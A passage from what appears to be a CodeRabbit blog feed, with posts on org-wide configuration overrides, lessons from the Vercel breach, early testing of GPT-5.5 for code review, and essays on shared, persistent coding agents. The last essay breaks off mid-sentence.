1. Open **Organization Settings** in the CodeRabbit UI
2. In the mode switcher at the bottom left of the sidebar, pick **Global Overrides**
3. Write YAML using the same schema as `.coderabbit.yaml` - only include the keys you want to enforce
4. Save

That's it. The overrides take effect on the next PR review across every repo in the org.

%[https://youtu.be/HG6hgv3Da-Q]

One small thing worth flagging: unlike the YAML Editor, the Global Overrides page shows all settings defined - including default values - so you can see exactly what's being enforced at a glance.

## What happens when the override meets an existing config

Three things, depending on the type:

* **Objects** get deep-merged. Override properties replace matching properties at each nesting level.
* **Arrays** get merged by key. Override entries take priority when keys match (e.g., `path` in `path_instructions`) and unique entries from other sources are kept.
* **Scalars** are simply overridden.

Arrays are worth a closer look because they're the trickiest of the three. Global Overrides uses the same key-based merge as [configuration inheritance](https://docs.coderabbit.ai/configuration/configuration-inheritance) - override entries win when keys match, and any unique entries a repo has stick around. That means you can't wipe a repo's array clean just by defining a shorter one in the override; if you want to replace an entry, your override has to match its key.

## Who can actually use this

Only organization admins can view or edit Global Overrides. That's the whole point - this is an enforcement mechanism, not a shared-defaults mechanism. If you want shared defaults that repos can customize on top of, use [central configuration](https://docs.coderabbit.ai/configuration/central-configuration) instead.

## When to reach for it (and when not to)

Global Overrides are built for policies that have to apply everywhere, every time. Think:

- Compliance-driven review profiles
- Mandatory path instructions for sensitive code (SQL, auth, payments)
- Required checks that can't be turned off
- Security rules the org needs to guarantee apply everywhere

They're not meant for general defaults. If a setting is something repos should usually have but occasionally deviate from, put it in organization settings or central configuration. Save Global Overrides for the things that must apply, always, everywhere.

## Try it out

If you're an org admin, head to **Organization Settings - Global Overrides** and set the policies you've been trying to enforce for months. It takes a minute. The next PR review picks it up.

## [Get started with CodeRabbit](https://coderabbit.link/Q5oy5FI)
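The three merge rules described earlier (deep-merge objects, merge arrays by key, replace scalars) can be sketched as a small recursive function. This is a sketch of the described semantics under stated assumptions, not CodeRabbit's code: `merge_config` and `array_keys` are hypothetical names, the ordering of merged arrays is a guess, and the handling of arrays without a known key is an assumption of this example.

```python
def _merge_arrays(base_items, over_items, key):
    """Override entries win on matching keys; unique base entries are kept."""
    if key is None:
        # Assumption: arrays with no known key keep override entries first,
        # followed by base entries that are not already present.
        return list(over_items) + [i for i in base_items if i not in over_items]
    overridden = {item[key] for item in over_items}
    return list(over_items) + [i for i in base_items if i[key] not in overridden]


def merge_config(base, override, array_keys):
    """Apply override on top of base using the three rules above."""
    merged = dict(base)
    for name, over_val in override.items():
        base_val = base.get(name)
        if isinstance(over_val, dict) and isinstance(base_val, dict):
            merged[name] = merge_config(base_val, over_val, array_keys)  # objects
        elif isinstance(over_val, list) and isinstance(base_val, list):
            merged[name] = _merge_arrays(base_val, over_val, array_keys.get(name))
        else:
            merged[name] = over_val  # scalars, or mismatched types
    return merged


# Illustrative repo config and org-level override.
repo = {"reviews": {"profile": "chill", "path_instructions": [
    {"path": "**/*.sql", "instructions": "repo rule"},
    {"path": "docs/**", "instructions": "check links"},
]}}
override = {"reviews": {"profile": "assertive", "path_instructions": [
    {"path": "**/*.sql", "instructions": "org rule"},
]}}
merged = merge_config(repo, override, {"path_instructions": "path"})
```

In `merged`, the SQL entry comes from the override, while the repo's `docs/**` entry survives because no override entry shares its `path`. That is the "you can't wipe a repo's array clean" behavior in miniature.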

What the Vercel breach means for enterprise code security

Sehtej Khehra — Fri, 24 Apr 2026 00:00:00 GMT

Just days ago, Vercel, a widely used cloud platform for deploying web applications, [disclosed](https://vercel.com/kb/bulletin/vercel-april-2026-security-incident) a breach that began months earlier. It started in a roundabout way, when a Context.ai employee unwittingly installed a Lumma Stealer disguised as a Roblox script. A Vercel employee, using Context.ai, then unwittingly got caught up in this trap. The attackers harvested the Vercel employee’s Google Workspace credentials via stolen OAuth tokens, then moved laterally and breached Vercel's internal systems. This exposed API keys, tokens, database credentials, signing keys, and more. In response, Vercel advised customers to rotate any environment variable not marked "sensitive" and to treat those values as compromised.

The inevitable post-mortems of this hack will focus on OAuth governance and third-party SaaS risk. Those angles are valid, but they miss the point for security leaders responsible for the code itself: *This was a developer supply chain attack, and the stolen assets prove it.*

## **What the Vercel breach taught us, and how CodeRabbit is built to address it**

Our customers trust us with their most valuable asset, their source code. That trust is why security isn't an afterthought. It's a CodeRabbit design principle.

### **Lesson 1: Every tool that touches your code is part of the attack surface**

The right question isn't whether a component in your developer stack gets breached. The better question is, what's the maximum damage an attacker can do from that point?

![CodeRabbit Architecture diagram detailing Handler, Reviewer, Database, Scanner, Token Service, and Audit Vault components.](https://victorious-bubble-f69a016683.media.strapiapp.com/security_posture_cr_627a56ab15.png)

We built the CodeRabbit code-review platform around that question. Every code review runs in an isolated, ephemeral sandbox that is provisioned per event and destroyed after completion.
Each sandbox holds a single, short-lived token scoped only to the repository under review. There’s no shared state between customers. There are no long-lived credentials. There’s no access to internal networks. Sandboxes can reach the public internet when tools require it, but cannot reach CodeRabbit's internal services. Stored code is encrypted with per-customer keys, inaccessible even to CodeRabbit employees.

The result is this: If a sandbox is compromised, there's nothing to pivot to. There are no persistent tokens and no lateral movement paths.

*If one of your sandboxes or workers is breached tomorrow, what's the worst-case outcome?*

Every enterprise should ask this of every vendor in their developer stack.

### **Lesson 2: Long-lived secrets in code are a major risk**

Many Vercel customers had to rotate keys they didn't know were exposed because the most damaging credentials are often the ones teams forget exist, buried in environment variables or hardcoded directly in source files.

Code review is the last practical checkpoint before a secret becomes permanent. Once a credential is committed to a Git repository, it can't be fully scrubbed. Copies persist in forks, caches, CI logs, and developer machines. The only reliable defense is catching it at the pull request.

CodeRabbit flags hardcoded credentials through a combination of pattern matching and AI-powered contextual analysis that understands data flow. Pattern matching catches formats like `sk_live_*`, `AKIA[A-Z0-9]{16}`, `ghp_[a-zA-Z0-9]{36}`, and variables named `*_SECRET`, `*_KEY`, or `*_PASSWORD`. We also integrate tools like Semgrep, Checkov, Brakeman, and Betterleaks, with one-click fixes surfaced directly in the pull request.

Security teams can define custom checks in natural language via `.coderabbit.yaml` and enforce them as pre-merge gates. Examples include blocking files that hardcode database DSNs or flagging OAuth scopes broader than `read:user`.
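To show what the pattern-matching half of that looks like at the pull request, here is a minimal sketch that scans only the added lines of a unified diff. It is not CodeRabbit's scanner: `scan_added_lines` and the rule names are hypothetical, the `sk_live_` regex is one assumed expansion of the `sk_live_*` glob, and the variable-name rule only fires when a quoted literal is assigned.

```python
import re

# Token formats named in the text; the sk_live_ character class is an assumption.
TOKEN_PATTERNS = {
    "stripe_live_key": re.compile(r"sk_live_[0-9a-zA-Z]+"),
    "aws_access_key_id": re.compile(r"AKIA[A-Z0-9]{16}"),
    "github_pat": re.compile(r"ghp_[a-zA-Z0-9]{36}"),
}

# Variables named *_SECRET, *_KEY or *_PASSWORD assigned a quoted literal.
SENSITIVE_NAME = re.compile(
    r"\b\w+_(SECRET|KEY|PASSWORD)\b\s*[:=]\s*['\"][^'\"]+['\"]"
)


def scan_added_lines(diff_text):
    """Return (diff line number, rule name) pairs for added lines only."""
    findings = []
    for lineno, line in enumerate(diff_text.splitlines(), start=1):
        # Only lines the PR adds matter; skip the "+++ b/file" header.
        if not line.startswith("+") or line.startswith("+++"):
            continue
        for rule, pattern in TOKEN_PATTERNS.items():
            if pattern.search(line):
                findings.append((lineno, rule))
        if SENSITIVE_NAME.search(line):
            findings.append((lineno, "hardcoded_sensitive_name"))
    return findings
```

A pass like this is cheap and noisy by design. Reading a value from the environment does not trigger it, but it also cannot tell a test fixture from a live key, which is where the contextual analysis described above comes in.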
Vercel has since updated its platform so new environment variables default to sensitive. That's a step in the right direction, but it only covers secrets that make it into environment variables. It doesn't catch credentials hardcoded in source files, feature branches, comments, or config files. The more robust approach: treat every credential as sensitive by default, and enforce that at the code review layer before it ever reaches production. ### **Lesson 3: Identity and access controls must extend to the code review layer** At its core, the Vercel breach was an identity breach. An OAuth token issued to a third-party app became an attacker's access path. Every tool with OAuth access in your workspace, every CI service running on long-lived GitHub tokens, every AI assistant with read access to a monorepo, each of those is a potential entry point. Your code review platform deserves the same identity rigor you apply to your identity provider. For [CodeRabbit Enterprise](https://coderabbit.ai/enterprise), that includes: * SSO and SAML support across major identity providers, with enforcement rather than optional bypass * Custom RBAC to enforce the principle of least privilege * Audit logging for all platform actions and administrative changes * Self-hosted deployment options for organizations that require code to remain within their network perimeter * Support for multi-organization structures, including subsidiaries and M\&A scenarios * SOC 2 Type II compliance, validated annually through independent audit * Zero data retention after review completion, with all code disposed of once the review ends * Vendor security reviews as a standard part of procurement *The goal is straightforward. 
Even if something upstream is breached, your code review tool should never be the next entry point in the attack chain.* ## **Questions enterprise security teams should ask vendors selling developer tools** The Vercel breach is a reminder to reassess every tool that touches your codebase. Ask these questions of any vendor with access to your source code, including us: 1. **Sandbox isolation:** Is it per-event, per-customer, or shared? What's the worst-case outcome if one sandbox is compromised? 2. **Token scope and lifetime:** Are tokens short-lived and repo-scoped, or long-lived service credentials? 3. **Encryption at rest:** Is code encrypted with per-customer keys? Can your own employees read stored customer code? 4. **Data retention:** Is code disposed of after review, or cached indefinitely? 5. **Self-hosted option:** Can organizations that can't send source code to an external SaaS deploy on their own infrastructure? 6. **SOC 2 and pen testing:** When was your last third-party security assessment, and is the report available under NDA? 7. **Vulnerability Disclosure Program:** Do you have one, and how have you responded when a researcher reported a finding? 8. **Sub-processors:** What third parties handle your data, is the list public, and how much notice do you give before adding a new one? 9. **Identity controls:** Do you offer SSO enforcement, SAML, SCIM, RBAC, and audit log export to a SIEM? 10. **Breach response:** How will you notify customers, how quickly, and what will you disclose? CodeRabbit's answers are detailed in our [full security architecture](https://www.coderabbit.ai/blog/our-security-posture-how-we-safeguard-your-repositories), and in our [Trust Center.](https://trust.coderabbit.ai/) Our team is also happy to answer any questions. ## **At CodeRabbit, security is our top priority** Supply chain attacks don't start at the primary target. They start at the weakest link. 
Every vendor in your developer workflow, every tool with a token, an OAuth grant, or read access to your code is a potential entry point. The Vercel breach didn't begin at Vercel. It began with a Roblox script. Demand answers. Every vendor you trust with your source code should be able to tell you exactly what happens if they're the next Vercel.

What changed in OpenAI GPT-5.5: Better judgment, stronger coding, better signal

Juan Pablo Flores — Thu, 23 Apr 2026 00:00:00 GMT

*Our early testing shows the model communicates more directly, finds higher-signal issues, and performs better in practical coding and review workflows.* *Note*: During release, you can try GPT-5.5 in ChatGPT and Codex. Using GPT-5.5 felt different in a fairly specific way: it was quicker, leaner, and more direct. In practice, that meant shorter responses, more selective review behavior, and a stronger bias toward small workable changes instead of broad rewrites. This is most relevant for teams using CodeRabbit, building agent workflows, or asking the model to make real changes in codebases. The model responded quickly, communicated with less overhead, and moved toward practical answers without much wasted motion. Part of that speed was also visible in how quickly it surfaced user-facing progress instead of waiting to finish all of its internal work before responding. That directness carried over into the quality of the output. Across code review, bug-fixing, and debugging tasks, the model consistently leaned toward scoped changes, preserved behavior more often, and usually focused on the actual failure mode rather than drifting into speculative redesign. ## **GPT-5.5 code review performance** One of the clearest strengths in our testing was code review. In the stronger examples, the model focused on bugs that were concrete, actionable, and worth interrupting a developer's flow. It showed up clearly in debugging-oriented reviews. When the task involved access control, error handling, or API behavior, the model was often able to isolate the actual regression, reject a weak diagnosis, and point toward a fix that preserved the intended behavior. The benchmark results align with this observation. The "baseline" mentioned in the subsequent diagram and text does not refer to a single comparison model. Instead, it signifies CodeRabbit's current live review system, which employs a combination of various models rather than relying on just one. 
In our early testing with GPT-5.5, the agent reached a 79.2% expected-issue-found rate on our curated review benchmark versus the baseline's 58.3%, improved precision from 27.9% to 40.6%, and produced 75 comments versus the baseline's 67. That means it found substantially more useful issues with only a modest increase in comment volume.

In testing, GPT-5.5 improved performance across several key metrics on our large-scale, real-world review set. Specifically, the expected issue found rate increased from a 55.0% baseline to 65.0%. Furthermore, precision improved from 11.6% to 13.2%. The agent also became more verbose, generating 722 comments compared to 558 with the previous baseline.

The practical takeaway is that GPT-5.5 outperformed the baseline on signal quality, even though its review volume was not uniformly lower than baseline.

![Bar charts comparing GPT-5.5 and a production baseline for review signal quality metrics.](https://victorious-bubble-f69a016683.media.strapiapp.com/image2_feae90543a.png)

Part of that behavior appears to come from the review standard behind the prompt. In plain terms, the model is being pushed to flag bugs that are real, local to the change, and specific enough that the author could fix them. It is not supposed to guess about hidden intent, complain about broad codebase quality, or flag issues that a compiler, type checker, or linter would already catch. The associated comment guidance follows the same logic: comments should be brief, explicit, and matter-of-fact.

If this performance carries into a future rollout, it would be a tangible benefit for CodeRabbit users. Increased selectivity translates to reduced time spent sifting through irrelevant comments, fewer redundant review threads, and a greater likelihood that the feedback you receive highlights the issues most worth addressing.

## **GPT-5.5 coding performance**

Separate from review, the model performed well at code generation and implementation work.
Its main strength here was control, as it tended to choose scoped changes, preserve existing interfaces when asked, and avoid overbuilding.

The examples collected show that pattern clearly. When tasked with extending endpoints, maintaining route contracts, or resolving operational issues, the model consistently favored precise modifications with predictable results: enhanced safety, interface preservation, and minimized unintended consequences. Rather than completely rewriting the code, it prioritized the smallest possible modification to resolve the issue while maintaining the stability of the surrounding system.

GPT-5.5's code generation excels when tasks are specific and limited in scope. It is highly effective for focused tasks such as bug fixes, minor API adjustments, refactoring that maintains original behavior, and adding targeted tests.

In UI tasks, that same pattern produced polished interaction work and solid library use, though originality remained more limited than execution quality. Our team saw better-than-expected animation handling and unusually detailed interactions, but also a tendency to fall back on familiar styling choices, including a noticeable indigo-violet color bias.

## **GPT-5.5 works best with clear direction**

For developers using the model directly, the interaction pattern is fairly clear. The model appears to do best when the task is scoped, the constraints are explicit, and the environment can provide feedback.

In practice, that means giving it concrete requirements, preserving interface expectations, and letting it run or inspect the system when possible. The model performed better when it could move through a visible loop of change, inspection, and correction rather than trying to solve everything in one shot. That fits the broader pattern we saw throughout the tests: more direct output, fewer wasted tokens, and better results on bounded tasks.
Our team's testing revealed that the model followed instructions too literally, especially when the prompt was poorly structured, lacked detail, or had weak underlying concepts. In those cases, the model often did not repair the direction on its own. It tended to execute the request as written, even when a more experienced collaborator might have paused, clarified, or challenged the premise. ![A product analysis slide detailing GPT 5.5's strengths and limitations in coding work.](https://victorious-bubble-f69a016683.media.strapiapp.com/image1_93f473f42c.png) That means the prompt quality has a bigger effect on the result than developers expect. The model looks strongest when the request is specific about the intended behavior, the constraints, and the success criteria. A vague or internally inconsistent prompt can lead the model to generate a rapid response, but that output is more likely to mirror the prompt's existing weaknesses rather than correct them. ## **Reduced tokens for long-running agents** A noteworthy focus of GPT-5.5 is efficiency. While this is harder to measure with benchmarks than performance in reviews, it emerged as one of the most distinct trends in our testing. The model was often less verbose and surfaced visible progress quickly. This suggests the new version requires fewer tokens for equivalent tasks compared to previous models, a benefit that is difficult to isolate in a single benchmark figure. This is especially relevant for agent harnesses that depend on repeated iterations to converge on the right answer. In systems that follow OpenClaw-like patterns, or any workflow where an agent has to plan, act, inspect, retry, and refine over many cycles, token inefficiency compounds quickly. If the model can stay concise while still being effective, it can reduce the amount of token-heavy overhead in those longer loops. 
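
To make the compounding concrete, here is a minimal sketch in Python. It assumes a simplified agent loop in which every iteration re-reads the full transcript so far and then appends its own output. The function name `total_tokens` and every token count below are hypothetical illustrations, not measurements from our testing.

```python
def total_tokens(iterations: int, base_context: int, output_per_step: int) -> int:
    """Tokens consumed by a loop where each step re-reads all prior output.

    Assumption: the transcript only grows, and each step emits the same
    number of output tokens. Real harnesses may truncate or summarize.
    """
    total = 0
    context = base_context
    for _ in range(iterations):
        # Each step pays for the context it reads plus the output it writes.
        total += context + output_per_step
        # This step's output becomes part of the next step's input.
        context += output_per_step
    return total


# Hypothetical numbers: same task, same 20-step loop, different verbosity.
verbose = total_tokens(iterations=20, base_context=2_000, output_per_step=800)
concise = total_tokens(iterations=20, base_context=2_000, output_per_step=500)

print(f"verbose: {verbose:,} tokens")
print(f"concise: {concise:,} tokens")
print(f"saved:   {1 - concise / verbose:.0%}")
```

Under these assumed numbers the verbose run consumes 208,000 tokens and the concise run 145,000. The output term grows with the square of the loop length, which is why per-step verbosity matters more as loops get longer.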
For teams building on external services or agent platforms, that can mean more room for iteration before token usage starts to drag down the workflow. ![Chart illustrates GPT 5.5's superior token efficiency compared to a verbose model, enabling more retries.](https://victorious-bubble-f69a016683.media.strapiapp.com/image3_d3066aea8a.png) ## **Should you use GPT-5.5?** GPT-5.5's primary strengths lie in the developer workflow, specifically excelling at: identifying more substantive issues than the previous model, implementing focused changes without broad refactoring, and effectively self-correcting after initial errors. For teams evaluating tools like CodeRabbit, the more defensible claim is better signal per review than baseline, not universally lower review volume. For developers using the model directly, the pattern is just as clear: give it a scoped task, make the constraints explicit, and let it verify its work against the actual system. [Get started with CodeRabbit](https://coderabbit.link/NcmblIe), connect your repo, get your first AI review in minutes. Free to try, no credit card required.

The IDE is no longer the center of software development

David Kravets — Thu, 23 Apr 2026 00:00:00 GMT

For decades, the center of gravity for software development has been the integrated development environment. The IDE was where engineering happened, where code was written, debugged, and refined before making its way into the world. It was the cockpit. Everything else was secondary. ## **The distributed reality of modern software development** But the gap between where engineering work begins and where it gets done has been widening for years. Today, it spans more systems, more teams, and more time zones than any single tool was ever designed to bridge. Consider what a senior engineer actually does during a typical day. Work starts in a Slack thread, a bug report, an architecture discussion, a customer escalation. It moves to a ticket. Then it lands in someone's terminal. By the time a developer starts the real work, they've already lost 20 minutes manually reconstructing context from a PRD nobody can find, a decision buried three threads deep, and a runbook that one person wrote and never shared. ![Flowchart of 'The Engineer's Actual Day' workflow from initial tasks to IDE through tickets.](https://victorious-bubble-f69a016683.media.strapiapp.com/The_distributed_reality_of_modern_software_development_c313bc990f.png) The IDE is present for perhaps one phase of that workflow. The rest unfolds across Git, CI/CD pipelines, monitoring tools, analytics platforms, incident management systems, and whatever messaging tool the team lives in. By the time the IDE opens, most of the real work has already happened somewhere else. **What AI changes about this picture** The emergence of capable AI, particularly AI that can interact with external systems through structured interfaces, introduces a different possibility. Instead of context-switching between a dozen tools to piece together a picture, it is increasingly possible that an engineer can interact with the entire operational ecosystem through a single conversational interface. 
Ask a question, get context synthesized across systems. Investigate an incident, retrieve correlated signals from monitoring, deployment history, and code in one thread. Prepare a fix, review its impact, and coordinate the response without ever leaving the environment where the investigation began.

This is not a new IDE. It is a different interaction model entirely. What is emerging is something closer to an operational interface, one that treats code as one artifact among many in a larger system, rather than the primary object around which everything else is organized. In essence, AI makes code cheaper and context more expensive.

## **The terminal is not the center of gravity, either**

Here is where the current wave of AI coding tools gets it partially right and then stops short. Most coding agents today treat the individual developer's terminal as the center of the universe. The typical sequence looks like this:

* A discussion happens in Slack
* Context gets mentally assembled by one engineer
* They switch to a CLI agent, prompt, generate code
* A PR appears

The rest of the team has no visibility into what happened, why it happened, or what decisions were made along the way. The work is done. The knowledge is gone.

Some tools attempt to address this with durable knowledge files that teams maintain manually. But a file that needs to be kept up to date by the same team that's already losing context is not a solution. It's a different version of the same problem. Crucial team context, such as the decision made in Tuesday's incident thread or the architectural tradeoff debated last sprint, doesn't end up in a markdown file. It ends up scattered or it ends up lost.

Knowledge that lives in one engineer's session doesn't scale. The engineer retires or changes teams, or the details simply get forgotten, and the organization absorbs the cost quietly, one reconstructed context at a time.

The async dispatch model compounds this. You send a task and wait. Something comes back. Maybe it's right.
Maybe it's not. Either way, you've lost the ability to steer. The iteration loop is slow, the feedback cycle is broken, and the rest of the team has no idea what's happening until a PR appears. The terminal-centric model fails in two directions. Work stays invisible to the team, and control stays out of reach mid-session. You can't course-correct. You can only wait for whatever comes back. ## **Where the interface should actually live** If the real work of software development happens across Slack threads, tickets, incidents, observability dashboards, and code, then the right interface is not one more tool that engineers have to switch into. It's the environment where they already operate. This is the premise behind the newly released [CodeRabbit Agent for Slack](https://coderabbit.link/cr-agent). CodeRabbit already reviews over two million pull requests per week for more than 15,000 engineering teams. CodeRabbit has built one of the most capable context engines in the industry, one that has learned, at production scale, how to assemble the right context for high-quality code decisions. The Slack Agent takes that same engine and brings it into the place where engineering teams already work. The mental model is a coding CLI, but shared, persistent, and governed. You start a task in a thread. The team sees it happening. Someone course-corrects mid-stream. The work is visible, decisions are recorded, and the knowledge persists at every level—in the thread, in the channel, and in the agent's growing understanding of your codebase, your team, and your systems. **The shift in what "development work" means** ![Mind map asking 'What does development work actually look like?' and listing key tasks.](https://victorious-bubble-f69a016683.media.strapiapp.com/The_shift_in_what_development_work_means_94a06770bc.png) This has meaningful implications for how engineering organizations should think about developer productivity and tooling strategy. 
When code writing is one action within a larger workflow, rather than the workflow itself, the tools that matter most are not necessarily the ones optimized for editing text. They are the ones that give engineers the clearest, fastest path to understanding system state and acting on it. That changes the calculus around several categories of work:

**Investigation and debugging.** A large percentage of senior engineering time is consumed not by writing new code, but by understanding why existing systems behave unexpectedly. An interface that can reason across logs, traces, recent commits, and historical incidents is potentially more valuable here than a better code editor.

**Maintenance and operational work.** The long tail of engineering tasks (fixing a configuration drift, responding to a customer-reported bug, updating a dependency with a known vulnerability) involves far more context retrieval than code authorship. An interface oriented around systems rather than files changes how efficiently this work gets done.

**Small fixes and targeted changes.** Not every code change requires deep local development. Many require understanding what to change and why, locating the right place, and making a surgical edit. When that investigation and implementation can happen in the same Slack thread where the bug was reported, the workflow compresses significantly.

**What this means for engineering leaders**

For executives and CTOs, the practical implication is this. Great engineers have always been tool-agnostic; the editor was never the point. What separates high-performing engineering organizations over the next several years will be how well their operational environment is connected, and how much reasoning capability sits on top of that shared layer.

The governance question is equally important. Most coding agents push spend and access down to the individual user. That creates chaos at scale, where nobody can answer the basics:

* Who is using the agent, and on which teams?
* How much is being spent, and against which budgets?
* What systems can it access?
* What knowledge does it see?

If you cannot answer those questions by team, channel, and workspace, you do not have governance. Instead, you have shadow AI infrastructure.

The CodeRabbit model ties agent identity to GitHub, scopes tools and memory per channel, and attributes cost at the channel and workspace level. An incident channel can access the observability stack and operational runbooks. An HR channel cannot access engineering logs. This is memory and tooling treated as permissions, not just product features, which is the only model that works for engineering organizations that need to reason about AI agent usage the same way they reason about any other system in production.

A few questions worth pressing on as you evaluate your own environment:

* How much of your engineers' time is spent context-switching between systems to assemble information that already exists, just in different places?
* If an engineer wanted to understand the current state of a system, across code, infrastructure, observability, and recent incidents, how many tools would they need to open?
* When a senior engineer leaves, what actually happens to the institutional knowledge they carried?

Organizations that treat developer tooling as primarily an IDE question are likely underinvesting in the infrastructure layer that will increasingly determine engineering velocity.

## **A Note for engineers and architects**

![Flowchart illustrating AI for engineers, showing AI models and MCP standards leading to an operational graph.](https://victorious-bubble-f69a016683.media.strapiapp.com/Note_For_Engineers_and_Architects_7dc4ce87f3.png)

From a technical perspective, two things came together to make this shift possible:
AI models capable of reasoning across heterogeneous context, and the emergence of standardized interfaces, MCP and similar protocols, that allow AI systems to connect to external tools in structured, composable ways. The consequence is that the integration layer, once something each team assembled manually through bespoke scripts and custom tooling, can increasingly be expressed as a connected operational graph that AI can navigate on behalf of the engineer.

This does not eliminate the need for engineers to understand their systems deeply. If anything, it raises the bar because the interface amplifies both good judgment and bad assumptions. An engineer who understands the system will use this kind of interface to move faster. An engineer who does not will move faster toward the wrong answer.

The technical work worth doing now is investing in the connective tissue: clean APIs between systems, structured data in monitoring and observability, and well-organized repositories with meaningful history. The agent interface is only as good as the systems it connects to.

## **The broader thesis**

The IDE was the right center of gravity for an era when software development was primarily a local activity, when the code was the system, more or less, and the developer's primary job was to author it. That era is not entirely over. But it is receding.

Software systems today are large, distributed, and deeply interconnected. The work of operating them is as much about understanding and responding to a living system as it is about writing new instructions for it. And the team context that makes that work possible (the decisions, the incident history, and the architectural rationale) has always lived in shared communication channels, not in individual terminals.

The developer interface that fits that reality should be synchronous, not async. Shared, not individual. Governed, not uncontrolled.
And built on context that accumulates over time instead of evaporating after every session. That is not a small change in tooling. It is a shift in what we mean by a development environment. The organizations that recognize this shift early and build the connected operational infrastructure to support it will have a structural advantage in engineering velocity that compounds over time.

*Try the new [CodeRabbit Agent for Slack](https://coderabbit.link/cr-agent) now!*

Your AI agent has amnesia

Harjot Gill — Wed, 22 Apr 2026 00:00:00 GMT

> **Schedule disasters and system bugs arise because the left hand doesn't know what the right hand is doing – Fred Brooks in [*The Mythical Man-Month*](https://en.wikipedia.org/wiki/The_Mythical_Man-Month) describing the [IBM OS/360 Project’s](https://spectrum.ieee.org/building-the-system360-mainframe-nearly-destroyed-ibm) coordination failures that nearly sank it.**

![Text discussing communication issues and their consequences in large programming projects.](https://victorious-bubble-f69a016683.media.strapiapp.com/communication_program_project_2d45d507eb.png)

*The Mythical Man-Month* remains one of the most popular books in engineering management and a staple on leaders’ shelves. Fifty years of SDLC evolution have been one long argument against that failure mode. [Agile](https://agilemanifesto.org/) placed developers in the same room as the product. DevOps tore down the wall between dev and ops. [Git](https://git-scm.com/book/en/v2/Getting-Started-A-Short-History-of-Git) and pull requests gave teams a shared record of what changed and why. [CI](https://martinfowler.com/articles/continuousIntegration.html) made the build everyone's problem. Platform teams built paved roads so tribal knowledge wouldn't have to be re-earned by every new hire. Every major shift was a bet on *shared understanding* beating *individual heroics*.

Then coding agents arrived, and we regressed. Every engineer now runs a private agent, on their own machine, in sessions nobody else can see. The agent starts each morning knowing nothing. Whatever reasoning was assembled yesterday, whatever alternatives were weighed, whatever context was loaded, whatever decisions were made in standups: all of it is gone.
The process starts to break, creating a false impression: “We are shipping faster than ever!”

![Bar chart showing relative percentage changes in developer metrics with AI's influence.](https://victorious-bubble-f69a016683.media.strapiapp.com/coderabbit_agent_1_43de16be57.png)

Brooks was describing human teams drifting apart over weeks. We're now adding AI teammates who drift apart within a single workday, and calling it high productivity. A new hire at least retains what they learned yesterday.

## The context tax

Recently, I watched a senior engineer spend 11 minutes setting up context before his coding agent wrote a single line. He described the architecture and explained why they use Postgres and something else. Finally, he pasted three files, a Linear ticket, and a Slack message of context from his tech lead about a service being deprecated.

![Diagram showing developer workflow from various tools to an agent-generated code output.](https://victorious-bubble-f69a016683.media.strapiapp.com/Screenshot_2026_04_21_at_3_21_10_PM_528c233444.png)

The agent wrote some code. Pretty good code, actually. Afterward, the senior engineer remarked that the next morning he would open a new session and probably do the whole thing again, from scratch, for a different context. The agent lacks team-level insight. This is AI-assisted development in 2026.

## The wrong problem

Nobody is talking about what the agent knows *before* it starts working.

The right framing of a problem can make an average thinker perform like a brilliant one, at least for humans. For AI agents, the gap is more substantial. The same model, given the same prompt, will produce wildly different code depending on whether it understands the system it's working in. Give an agent your codebase with no context and you get plausible-looking code that misses every convention your team spent two years establishing.
Give the same agent your codebase plus your architectural decisions, ticket history, on-call runbooks, and the Slack thread where your team decided to deprecate the old auth service, and you get code that looks like a teammate wrote it. Right now, developers are the ones manually assembling that context every single session, acting as interpreters between their own engineering org and a tool that should already know. ## Five kinds of agent amnesia The context problem is the most visible symptom, but the disease is more systemic. There are at least five ways the current generation of agents forget: ### Systems Every session starts cold with no context on systems and choices. The agent opens a file and has no idea why your team chose Postgres over Redis for queues, which auth service is about to be deprecated, or that you decided last quarter to let errors bubble up unwrapped. However, that context exists in a PRD nobody reads, a Slack thread from March, and a senior engineer's head. The first thing a developer does every morning is translate it into a prompt. Again, the dev is reconstructing information that already exists somewhere else in your company, and is adding it into a context window that is limited to a personal session. ### Its own past work The agent you taught yesterday isn't the agent you're using today. You walked it through the billing module: the retry logic that looks wrong but isn't, why you can't trust Stripe's idempotency key on webhooks, and the failed refactor from last summer that's still in the git history as a warning. It produced good code. You closed the tab. What's left is a commit. The reasoning that led to it (the part you'd actually want to keep) went away with the session. Open the same file next week, and you'll do it all again. PS: Yes, you are storing/sharing in [agents.md](http://agents.md) or another durable knowledge base. 
But is that file updated continuously enough to capture crucial team context, and is it easy to maintain alongside the team's day-to-day work?

### Teammates

Coding agents are single player. One developer, one session, one machine. The work is invisible to everyone else on the team. If you need to hand off something, your teammate starts from zero because there's nothing to hand off *to*. We spent a decade making development collaborative: Git, pull requests, shared CI, and dashboards that anyone can open. Then we built AI dev tools that made development siloed!

### What happened next

The agent writes a piece of code, which makes it to a PR and goes through code review. Next sprint, someone rewrites half of that code, and a month later a bug in it intermittently brings production down. Engineers then collaborate on Slack or GitHub to fix the regression. Your agent is out of the loop on all these decisions.

Engineers get better by shipping code that gets reviewed, deployed, broken, and fixed. At each stage, there are collective learnings for the team and for the individual. If you remove the agent from that loop, you are left with an agent that generates plausible code indefinitely, without ever learning which forms of “plausible” actually survive contact with production.

### That somebody is watching

Okay! We are not gonna get past every developer running a local AI coding agent, whether in a CLI, an IDE, or some other new form factor (ADE?!). However, the engineering org has no shared view of what agents are doing and how they are performing across the team. Which systems are they touching? How are they spending?

The economics will force the question soon enough. Uber's CTO told [The Information](https://www.theinformation.com/newsletters/applied-ai/uber-cto-shows-claude-code-can-blow-ai-budgets) this year that his team had already burned through its entire 2026 AI coding budget. Agent amnesia is essentially becoming an economics question.
Token spend multiplied by each engineer and compounded daily is a harder problem for engineering teams to solve because they can’t walk away from the productivity gains that got them here in the first place. ## But my terminal coding agent works fine For you. Individually. On your machine. Yes. I'm not arguing that terminal agents don't work. They clearly do. Claude Code, Codex, they're great tools. And, we're not trying to replace them. In fact, features like steering control, sub-agent framework, hooks, and plugins are all immensely useful for a developer, helping them produce more code than ever\! To be clear, these tools do have memory. Claude Code reads a project-level CLAUDE.md, a user-level one, and persists notes in a local memory directory that survive across sessions. It's the durable team knowledge that is lost in local agentic coding sessions. The senior engineer's hard-won understanding of the billing module lives in her markdown files, on her laptop. When a colleague across the geo opens their first session, none of it carries across or persists. ## What agents need to become Edsger W. Dijkstra [wrote](https://www.cs.utexas.edu/~EWD/transcriptions/EWD03xx/EWD340.html) that the competent programmer is fully aware of the strictly limited size of his own skull. Agents don't have skulls. They don't have to forget. We made them forget because we modeled them on ephemeral terminal sessions instead of durable environments where teams actually work. Here's what the next generation looks like, once we stop treating amnesia as a given: **Knowledge 